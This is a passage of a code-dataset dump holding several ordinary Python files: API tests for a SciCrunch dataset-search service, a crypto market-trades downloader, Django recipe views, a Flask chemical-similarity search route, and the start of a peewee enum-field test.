client.get('/dataset_info/using_pennsieve_identifier', query_string={'identifier': dataset_id})\n response = json.loads(r.data)\n result = response['result'][0]\n status = True\n if version.parse(result['version']) >= version.parse(\"1.1.4\"):\n if has_doi_changed(result['doi'].replace('https://doi.org/', ''), doi):\n warn_doi_changes()\n status = False\n\n return status\n\n\ndef test_scicrunch_dataset_doi(client):\n # Testing with dataset 55\n identifier = \"55\"\n run_doi_test = check_doi_status(client, identifier, '10.26275/pzek-91wx')\n\n if run_doi_test:\n r = client.get('/scicrunch-dataset/DOI%3A10.26275%2Fpzek-91wx')\n dataset_version = json.loads(r.data)['hits']['hits'][0]['_source']['item']['version']['keyword']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n assert json.loads(r.data)['hits']['hits'][0]['_id'] == \"55\"\n assert json.loads(r.data)['hits']['hits'][0]['_source']['item']['curie'] == \"DOI:10.26275/pzek-91wx\"\n else:\n assert json.loads(r.data)['hits']['hits'][0]['_id'] == \"DOI:10.26275/pzek-91wx\"\n else:\n pytest.skip('DOI used in test is out of date.')\n\ndef test_scicrunch_multiple_dataset_doi(client):\n # Testing with dataset 55 and 68\n run_doi_test_1 = check_doi_status(client, \"55\", '10.26275/pzek-91wx')\n run_doi_test_2 = check_doi_status(client, \"68\", '10.26275/4qvr-kwzq')\n\n if run_doi_test_1 and run_doi_test_2:\n r = client.get('/dataset_info/using_multiple_dois/?dois=10.26275%2Fpzek-91wx&dois=10.26275%2F4qvr-kwzq')\n results = json.loads(r.data)['results']\n dataset_version = results[0]['version']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n discover_id_1 = results[0]['dataset_identifier']\n discover_id_2 = results[1]['dataset_identifier']\n assert discover_id_1 == \"55\" or discover_id_1 == \"68\"\n assert discover_id_2 == \"55\" or discover_id_2 == \"68\"\n else:\n pytest.skip('DOI used in test is out of date.')\n\ndef test_scicrunch_multiple_dataset_ids(client):\n # Testing with dataset 55 and 68\n r = client.get('/dataset_info/using_multiple_discoverIds/?discoverIds=55&discoverIds=68')\n results = json.loads(r.data)['results']\n dataset_version = results[0]['version']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n discover_id_1 = results[0]['dataset_identifier']\n discover_id_2 = results[1]['dataset_identifier']\n assert discover_id_1 == \"55\" or discover_id_1 == \"68\"\n assert discover_id_2 == \"55\" or discover_id_2 == \"68\"\n\ndef test_scicrunch_search(client):\n r = client.get('/search/heart')\n assert r.status_code == 200\n assert json.loads(r.data)['numberOfHits'] > 4\n\n\ndef test_scicrunch_all_data(client):\n r = client.get('/filter-search/')\n assert json.loads(r.data)['numberOfHits'] > 40\n\n\ndef test_scicrunch_filter(client):\n r = client.get('/filter-search/', query_string={'term': 'organ', 'facet': 'heart'})\n assert json.loads(r.data)['numberOfHits'] > 4\n\n\ndef test_scicrunch_filter_scaffolds(client):\n r = client.get('/filter-search/?facet=scaffolds&term=datasets')\n assert json.loads(r.data)['numberOfHits'] > 10\n\n\ndef test_scicrunch_filter_simulations(client):\n r = client.get('/filter-search/?facet=simulations&term=datasets')\n assert json.loads(r.data)['numberOfHits'] > 0\n\n\ndef test_scicrunch_basic_search(client):\n r = client.get('/filter-search/Heart/?facet=All+Species&term=species')\n assert json.loads(r.data)['numberOfHits'] > 10\n\n\ndef test_scicrunch_boolean_logic(client):\n r = 
client.get('/filter-search/?facet=All+Species&term=species&facet=male&term=gender&facet=female&term=gender')\n assert json.loads(r.data)['numberOfHits'] > 20\n\n\ndef test_scicrunch_combined_facet_text(client):\n r = client.get('/filter-search/heart/?facet=All+Species&term=species&facet=male&term=gender&facet=female&term=gender')\n assert json.loads(r.data)['numberOfHits'] > 1\n\n\ndef test_getting_facets(client):\n r = client.get('/get-facets/organ')\n facet_results = json.loads(r.data)\n facets = [facet_result['key'] for facet_result in facet_results]\n assert 'heart' in facets\n\n\ndef test_create_identifier_query(client):\n r = client.get('/dataset_info/using_object_identifier?identifier=package:e6435710-dd9c-46b7-9dfd-932103469733')\n\n json_data = json.loads(r.data)\n assert 'result' in json_data\n\n results = json_data['result']\n assert len(results) == 1\n\n result = results[0]\n assert 'version' in result\n assert result['version'] == '1.1.3'\n\n assert 'title' in result\n assert result['title'] == 'Morphometric analysis of the abdominal vagus nerve in rats'\n\n\ndef test_response_version(client):\n # Testing with dataset 44\n identifier = \"44\"\n doi = \"10.26275/duz8-mq3n\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n assert len(json_data['result']) == 1\n assert 'version' in json_data['result'][0]\n else:\n pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_abi_plot(client):\n # Testing abi-plot with dataset 141\n identifier = \"141\"\n doi = \"10.26275/9qws-u3px\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n assert len(json_data['result']) == 1\n if json_data['result'][0]['version'] == '1.1.5':\n assert len(json_data['result'][0]['abi-plot']) == 5\n identifier = json_data['result'][0][\"dataset_identifier\"]\n version = json_data['result'][0][\"dataset_version\"]\n assert identifier == \"141\"\n assert version == \"3\"\n # Construct the file path prefix, it should be /exists/141/3/files\n path_prefix = '/'.join(('', 'exists', identifier, version, 'files'))\n for plot in json_data['result'][0]['abi-plot']:\n for path in plot['datacite']['isDescribedBy']['path']:\n if path:\n path = '/'.join((path_prefix, path))\n # Check if the file exists using the /exists/{path} route\n r2 = client.get(path)\n data2 = r2.data.decode('utf-8')\n json_data2 = json.loads(data2)\n print(path)\n assert json_data2['exists'] == 'true'\n else:\n pytest.skip('Only test abi-plot against version 1.1.5.')\n else:\n pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_abi_scaffold(client):\n # Testing abi-scaffold with dataset 76\n identifier = \"76\"\n doi = \"10.26275/jarb-s8jw\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n if len(json_data['result']) == 1:\n if json_data['result'][0]['version'] == '1.1.5':\n identifier = json_data['result'][0][\"dataset_identifier\"]\n dataset_version = json_data['result'][0][\"dataset_version\"]\n assert identifier == \"76\"\n assert dataset_version == \"4\"\n # Construct the file path prefix, it should be /exists/76/4/files\n 
path_prefix = '/'.join(('', 'exists', identifier, dataset_version, 'files'))\n                assert len(json_data['result'][0]['abi-scaffold-metadata-file']) == 1\n                for plot in json_data['result'][0]['abi-scaffold-metadata-file']:\n                    for path in plot['datacite']['isSourceOf']['path']:\n                        if path:\n                            path = '/'.join((path_prefix, path))\n                            # Check if the file exists using the /exists/{path} route\n                            r2 = client.get(path)\n                            data2 = r2.data.decode('utf-8')\n                            json_data2 = json.loads(data2)\n                            print(path)\n                            assert json_data2['exists'] == 'true'\n\n                assert len(json_data['result'][0]['abi-scaffold-view-file']) == 4\n                for plot in json_data['result'][0]['abi-scaffold-view-file']:\n                    for path in plot['datacite']['isSourceOf']['path']:\n                        if path:\n                            path = '/'.join((path_prefix, path))\n                            # Check if the file exists using the /exists/{path} route\n                            r2 = client.get(path)\n                            data2 = r2.data.decode('utf-8')\n                            json_data2 = json.loads(data2)\n                            print(path)\n                            assert json_data2['exists'] == 'true'\n\n                assert len(json_data['result'][0]['abi-scaffold-thumbnail']) == 4 \n                for plot in json_data['result'][0]['abi-scaffold-thumbnail']:\n                    for path in plot['datacite']['isDerivedFrom']['path']:\n                        if path:\n                            path = '/'.join((path_prefix, path))\n                            # Check if the file exists using the /exists/{path} route\n                            r2 = client.get(path)\n                            data2 = r2.data.decode('utf-8')\n                            json_data2 = json.loads(data2)\n                            print(path)\n                            assert json_data2['exists'] == 'true'\n            else:\n                pytest.skip('Only test abi-scaffold against version 1.1.5.')\n    else:\n        pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_sample_subject_size(client):\n    # Only filter search returns the sampleSize and subjectSize\n    r = client.get('/filter-search/?facet=pig&term=species&facet=urinary+bladder&term=organ')\n    data = r.data.decode('utf-8')\n    json_data = json.loads(data)\n    print(json_data)\n    assert len(json_data['results']) == 1\n    assert json_data['results'][0]['sampleSize'] == '509'\n    assert json_data['results'][0]['subjectSize'] == '8'\n\n\nsource_structure = {\n    'type': dict,\n    'required': ['contributors', 'dataItem', 'dates', 'distributions',\n                 {'item':\n                  {\n                      'type': dict,\n                      'required': [{'version': {'type': dict, 'required': ['keyword'], 'optional': []}}, 'types', 'contentTypes', 'names', 'statistics', 'keywords', 'published',\n                                   'description',\n                                   'name', 'readme', 'identifier', 'docid', 'curie'],\n                      'optional': ['techniques', 'modalities']\n                  }}, 'pennsieve', 'provenance', 'supportingAwards'],\n    'optional': ['anatomy', 'attributes', 'diseases',\n                 {'objects':\n                  {\n                      'type': list,\n                      'item': {\n                          'type': dict,\n                          'required': ['bytes', 'dataset', 'distributions', 'identifier', 'mimetype', 'name', 'updated'],\n                          'optional': []}\n                  }\n                  }, 'organisms', 'protocols', 'publication', 'xrefs']\n}\nraw_structure_base = {\n    'type': dict,\n    'required': [\n        {'hits': {\n            'type': dict,\n            'required': [\n                {'hits':\n                 {'type': list,\n                  'item': {\n                      'type': dict,\n                      'required': ['_index', '_type', '_id', '_score',\n                                   {'_source': source_structure}\n                                   ],\n                      'optional': ['_ignored']}\n                  }\n                 }\n            ],\n            'optional': [],\n        }\n        }\n    ],\n    'optional': []\n}\n\n\nclass StructureDefinitionError(Exception):\n    pass\n\n\n
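Editor's illustration (not in the original test file) of how the schema dicts above are meant to be read by the validators defined next: a `{'type': dict, 'required': [...], 'optional': [...]}` node lists keys that must or may appear, a plain string entry is a bare presence check, and a `{'key': sub_schema}` entry recurses into the value. The data here is hypothetical.

```python
# A hypothetical schema in the same format as raw_structure_base above.
schema = {
    'type': dict,
    'required': ['name',
                 {'tags': {'type': list,
                           'item': {'type': dict, 'required': ['id'], 'optional': []}}}],
    'optional': ['notes'],
}

good = {'name': 'demo', 'tags': [{'id': 1}, {'id': 2}]}
bad = {'name': 'demo', 'tags': [{'label': 'x'}]}  # list item is missing required 'id'

# With the functions defined below:
# _test_structure(good, schema) -> True
# _test_structure(bad, schema)  -> False
```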
def _test_sub_structure(data, structure, required=True):\n    for st in structure:\n        if isinstance(st, str):\n            if required and st not in data:\n                print(f'failed: {st}')\n                return False\n\n            continue\n\n        # each non-string entry must be a dict with exactly one key\n        if not len(st.keys()) == 1:\n            raise StructureDefinitionError\n\n        key = next(iter(st))\n        if required and key not in data:\n            print(f'key failed: {key}')\n            return False\n\n        # if key == '_source':\n        #     a = list(data[key].keys())\n        #     a.sort()\n        #     print(a)\n        if key in data and not _test_structure(data[key], st[key]):\n            print(f'structure failed: {key} - {st[key][\"type\"]}, {type(data[key])} - {st[key]} - {len(data[key])}')\n            return False\n\n    return True\n\n\ndef _test_structure(data, structure):\n    structure_type = structure['type']\n    # print('=============================')\n    # print(structure)\n    if isinstance(data, structure_type):\n        if structure_type is dict:\n            if not _test_sub_structure(data, structure['required'], required=True):\n                return False\n\n            if not _test_sub_structure(data, structure['optional'], required=False):\n                return False\n        elif structure_type is list:\n            for list_item in data:\n                if not _test_structure(list_item, structure['item']):\n                    return False\n        else:\n            print('type is not dict or list', type(data))\n\n        return True\n\n    return False\n\n\ndef test_raw_response_structure(client):\n    # 10.26275/zdxd-84xz\n    # 10.26275/duz8-mq3n\n    query = create_query_string(\"computational\")\n    data = dataset_search(query)\n    # print(data['hits']['hits'][0]['_source']['objects'])\n    # print(data['hits']['hits'][0]['_source']['item'])\n    assert _test_structure(data, raw_structure_base)\n    assert 'hits' in data\n    assert 'hits' in data['hits']\n    assert isinstance(data['hits']['hits'], list)\n    for hit in data['hits']['hits']:\n        if 'version' in hit['_source']['item']:\n            print(hit['_source']['item']['version']['keyword'])\n        else:\n            print('no version')\n\n    for hit in data['hits']['hits']:\n        print(hit['_source'].keys())\n    objects = data['hits']['hits'][0]['_source']['objects']\n    for o in objects:\n        mimetype = o.get('mimetype', {}).get('name', 'not-specified')\n        # print('mimetype: ', mimetype)\n        if mimetype == 'image/png':\n            # print(o)\n            print('.', end=\"\")\n\n    print()\n    # for k in data['hits']['hits'][0]:\n    #     print(k, data['hits']['hits'][0][k])\n\n\ndef test_getting_curies(client):\n    # Test if we get a shorter list of uberons with species specified\n    r = client.get('/get-organ-curies/')\n    uberons_results = json.loads(r.data)\n    total = len(uberons_results['uberon']['array'])\n    assert total > 0\n    r = client.get('/get-organ-curies/?species=human')\n    uberons_results = json.loads(r.data)\n    human = len(uberons_results['uberon']['array'])\n    assert total > human\n    # Test that each uberon id/name pair matches the hardcoded list\n    for item in uberons_results['uberon']['array']:\n        assert UBERONS_DICT[item['id']] == item['name'].lower()\n\n\ndef test_scaffold_files(client):\n    r = client.get('/filter-search/?size=30')\n    results = json.loads(r.data)\n    assert results['numberOfHits'] > 0\n    for item in results['results']:\n        if 'abi-scaffold-metadata-file' in item and 's3uri' in item:\n            uri = item['s3uri']\n            path = item['abi-scaffold-metadata-file'][0]['dataset']['path']\n            key = f\"{uri}files/{path}\".replace('s3://pennsieve-prod-discover-publish-use1/', '')\n            r = client.get(f\"/s3-resource/{key}\")\n            assert r.status_code == 200\n\ndef test_finding_contextual_information(client):\n    r = client.get('/dataset_info/using_multiple_discoverIds/?discoverIds=76')\n    results = json.loads(r.data)\n    assert results['numberOfHits'] > 0  # Test we could find the generic colon scaffold dataset\n    for item in results['results']:\n        assert len(item['abi-contextual-information']) > 0  # Check it has contextual information\n", "sub_path": "tests/test_scicrunch.py", "file_name": "test_scicrunch.py", "file_ext": "py", "file_size_in_byte": 17192, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "13", "api": [{"api_name": "app.app.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 16, "usage_type": "name"}, {"api_name": "app.app.test_client", "line_number": 17, "usage_type": "call"}, {"api_name": "app.app", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 31, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 31, "usage_type": "name"}, {"api_name": "known_dois.has_doi_changed", "line_number": 32, "usage_type": "call"}, {"api_name": "known_dois.warn_doi_changes", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 47, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 47, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 53, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 64, "usage_type": "name"}, {"api_name": "pytest.skip", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 75, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 77, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 77, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 96, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 101, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 106, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 116, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 126, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 134, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 156, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 160, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 171, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 176, "usage_type": "name"}, {"api_name": "packaging.version", "line_number": 178, "usage_type": "name"}, {"api_name": "packaging.version", "line_number": 180, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 192, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 194, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 205, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 234, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 246, "usage_type": "call"}, {"api_name": 
"pytest.skip", "line_number": 250, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 252, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 259, "usage_type": "call"}, {"api_name": "app.scicrunch_requests.create_query_string", "line_number": 372, "usage_type": "call"}, {"api_name": "app.main.dataset_search", "line_number": 373, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 404, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 408, "usage_type": "call"}, {"api_name": "known_uberons.UBERONS_DICT", "line_number": 413, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 418, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "146610869", "text": "from datetime import datetime\nfrom typing import NoReturn\n\nfrom injector import inject\n\nfrom application.command import DownloadMarketTradesCommand\nfrom domain.model.asset import Asset\nfrom domain.model.currency import Currency\nfrom domain.model.market.market_service import MarketService\nfrom domain.model.trade import MarketTrades, MarketTradesRepository\nfrom exception import SystemException\nfrom others import log\n\n\nclass MarketTradesApplicationService:\n \"\"\"取引所の歩み値をダウンロードするアプリケーションサービス\"\"\"\n\n @inject\n def __init__(self,\n market_service: MarketService,\n market_trades_repository: MarketTradesRepository):\n self.__market_service = market_service\n self.__market_trades_repository = market_trades_repository\n\n def download(self, command: DownloadMarketTradesCommand) -> NoReturn:\n asset = Asset(command.asset_name)\n currency = Currency(command.currency_name)\n pair = (asset, currency)\n\n log.info(\"{}/{}の歩み値をダウンロードします\".format(asset.name, currency.name))\n\n # ダウンロードする期間を指定\n _from = command.period.start\n _to = command.period.end\n while True:\n try:\n # 取引所から歩み値を取得します\n market_trades: MarketTrades = self.__market_service.fetch_market_trades(pair, _from)\n\n # 取得した歩み値を保存します\n self.__market_trades_repository.save(market_trades)\n\n # 最後の約定日時のタイムスタンプを取得する\n last_timestamp = market_trades.last_timestamp()\n log.info(\"最終約定日時: {}\".format(datetime.fromtimestamp(int(last_timestamp))))\n\n # 指定した日時まで取得できたら処理を止める\n if last_timestamp > _to.timestamp():\n break\n\n if last_timestamp != _from.timestamp():\n _from = datetime.fromtimestamp(int(last_timestamp))\n else:\n # 最初の約定日時と最後の約定日時が同じ場合、同じ_from値でリクエストしてしまうので+1する\n _from = datetime.fromtimestamp(int(last_timestamp + 1))\n except SystemException as e:\n e.logging()\n break\n\n log.info(\"{}/{}の歩み値をダウンロードが完了しました\".format(asset.name, currency.name))\n", "sub_path": "application/service/market_trades_application_service.py", "file_name": "market_trades_application_service.py", "file_ext": "py", "file_size_in_byte": 2556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "domain.model.market.market_service.MarketService", "line_number": 20, "usage_type": "name"}, {"api_name": "domain.model.trade.MarketTradesRepository", "line_number": 21, "usage_type": "name"}, {"api_name": "injector.inject", "line_number": 18, "usage_type": "name"}, {"api_name": "application.command.DownloadMarketTradesCommand", "line_number": 25, "usage_type": "name"}, {"api_name": "domain.model.asset.Asset", "line_number": 26, "usage_type": "call"}, {"api_name": "domain.model.currency.Currency", "line_number": 27, "usage_type": "call"}, {"api_name": "others.log.info", "line_number": 30, "usage_type": "call"}, 
{"api_name": "others.log", "line_number": 30, "usage_type": "name"}, {"api_name": "domain.model.trade.MarketTrades", "line_number": 38, "usage_type": "name"}, {"api_name": "others.log.info", "line_number": 45, "usage_type": "call"}, {"api_name": "others.log", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 55, "usage_type": "name"}, {"api_name": "exception.SystemException", "line_number": 56, "usage_type": "name"}, {"api_name": "others.log.info", "line_number": 60, "usage_type": "call"}, {"api_name": "others.log", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.NoReturn", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "448343388", "text": "from django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom recipes.models import *\nfrom recipes.forms import *\nfrom userprofiles.models import UserProfile\nfrom django.contrib.auth.models import User\n\ndef all(request, page=None):\n\tif page:\n\t\tl = page*15\n\t\th = l+15\n\telse:\n\t\tl = 0\n\t\th = 15\n\trecipes = Recipe.objects.all().order_by('-pk')[l:h]\n\treturn render_to_response('recipes/all.htm',\n\t\t\t\t\t\t\t {'title':'Recipes', 'recipes':recipes, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\ndef view(request, pk=None):\n\trecipe = get_object_or_404(Recipe, pk=pk)\n\trecipe.formatted = recipe.formatted_body('ul')\n\treturn render_to_response('recipes/view.htm',\n\t\t\t\t\t\t\t {'title':recipe.name, 'recipe':recipe, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\ndef view_by_user(request, username=None):\n\t#user = get_object_or_404(User, username=username)\n\tprofile = get_object_or_404(UserProfile, user__username=username)\n\trecipes = Recipe.objects.filter(creator__username=username)\n\treturn render_to_response('recipes/view_by_user.htm',\n\t\t\t\t\t\t\t {'profile':profile, 'recipes':recipes, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\n@login_required\ndef create(request):\n\tif request.method == 'POST':\n\t\tform = CreateRecipeForm(request.POST, extra=request.POST.get('ingredient_fields'))\n\t\tif form.is_valid():\n\t\t\tingredients = ''\n\t\t\tfor field in xrange(10):\n\t\t\t\tingredients += form.cleaned_data['ingredient_field_%d' % field] + '\\n'\n\n\t\t\trecipe = Recipe.objects.create(creator=request.user, name=form.cleaned_data['name'],\n\t\t\t\t\t\t\t\t\t\t recipe=ingredients.rstrip(), notes=form.cleaned_data['notes'])\n\t\t\trecipe.save()\n\n\t\t\treturn HttpResponseRedirect('/recipes/view/%d/' % recipe.pk)\n\t\telse:\n\t\t\treturn render_to_response('recipes/create.htm',\n\t\t\t\t\t\t\t \t\t {'form':form, 'recipes_active':True},\n\t\t\t\t\t\t\t \t\t context_instance=RequestContext(request))\n\telse:\n\t\tform = CreateRecipeForm()\n\treturn render_to_response('recipes/create.htm',\n\t\t\t\t\t\t\t {'form':form, 'recipes_active':True},\n\t\t\t\t\t\t\t 
context_instance=RequestContext(request))", "sub_path": "recipes/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "recipes.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 18, "usage_type": "call"}, {"api_name": "recipes.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.template.RequestContext", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 25, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 31, "usage_type": "call"}, {"api_name": "userprofiles.models.UserProfile", "line_number": 31, "usage_type": "argument"}, {"api_name": "recipes.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 33, "usage_type": "call"}, {"api_name": "recipes.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.template.RequestContext", "line_number": 35, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 52, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 54, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 57, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 37, "usage_type": "name"}]}
{"seq_id": "448343388", "text": "import time\nfrom flask import Blueprint, render_template, request, current_app\n\nfrom services.mysql_service import MySQLService\nfrom utils.chemical_utils import simple_compare, get_chemical_composition, get_key\n\nsearches = Blueprint('searches', __name__, template_folder='templates')\n\ndb = MySQLService()\n\n\n# Default search by name\n@searches.route('/search', methods=['POST'])\ndef default_search():\n    if request.method == 'POST':\n        name = request.form['mat_name']\n        conn = db.get_connection()\n        cur = conn.cursor()\n        cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info WHERE marka like %s or marka = %s\",\n                    (\"%\" + name + \"%\", name))\n        materials = cur.fetchall()\n        cur.close()\n        return render_template('default_search.html', materials=materials, name=name)\n\n\n@searches.route('/chemical_search/<int:id>', methods=['POST', 'GET'])\ndef chemical_search(id):\n    conn = db.get_connection()\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info where id = %s\", [id])\n    base_material = cur.fetchone()\n\n    result = cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info where id != %s\", [id])\n    other_materials = cur.fetchall()\n\n    cur.execute(\n        \"SELECT atomic_Number, average FROM rloveshhenko$mydbtest.chemical_composition WHERE main_info_id = %s\", [id])\n    chem_composition_first = cur.fetchall()\n\n    cur.execute(\n        \"SELECT main_info_id, atomic_Number, average FROM rloveshhenko$mydbtest.chemical_composition WHERE main_info_id != %s\",\n        [id])\n    chem_composition_others = cur.fetchall()\n\n    
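Editor's note on `default_search` above: the LIKE wildcards belong in the bound parameter, not in the SQL string, so the pattern stays injection-safe; the second placeholder can then be an exact match on the raw name. A minimal sketch with a hypothetical cursor:

```python
def find_by_name(cur, name):
    # Fuzzy match via a parameterized LIKE pattern, plus an exact match fallback.
    cur.execute(
        "SELECT * FROM main_info WHERE marka LIKE %s OR marka = %s",
        ("%" + name + "%", name),
    )
    return cur.fetchall()
```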
current_app.logger.info('Other materials: ' + str(result))\n start_time = time.time()\n\n # indexes = chemical_Compare(chem_composition_first, chem_composition_others, other_materials, cur)\n for mat in other_materials:\n mat['index'] = simple_compare(chem_composition_first, get_chemical_composition(mat['id'], chem_composition_others))\n \"\"\"for material in other_materials:\n\t\tmaterial['index'] = chemical_Compare(chem_composition_first, material['id'], cur)\"\"\"\n\n finish_time = time.time()\n print(other_materials[-1])\n res = sorted(other_materials, key=get_key)\n print(res[-1])\n cur.close()\n current_app.logger.info('Time spent: ' + str(finish_time - start_time))\n return render_template('similar_materials.html', materials=res, base_material=base_material)\n", "sub_path": "routes/search_routes.py", "file_name": "search_routes.py", "file_ext": "py", "file_size_in_byte": 2332, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "services.mysql_service.MySQLService", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.current_app.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.current_app.logger", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 45, "usage_type": "name"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "utils.chemical_utils.simple_compare", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.chemical_utils.get_chemical_composition", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.chemical_utils.get_key", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.current_app.logger.info", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.current_app.logger", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "590580440", "text": "import peewee\nimport pytest\n\nimport lasagna.db.orm as db_orm\n\n\ndef test_enum(gen_table):\n class TestTable(peewee.Model):\n enum = db_orm.EnumField(choices=['foo', 'bar'])\n\n test_table = gen_table(TestTable)\n test_table.create(enum='foo')\n res = test_table.select(test_table).execute().next()\n\n assert res.enum == 'foo'\n\n\ndef test_invalid_enum(gen_table):\n class TestTable(peewee.Model):\n enum = db_orm.EnumField(choices=['foo', 'bar'])\n\n 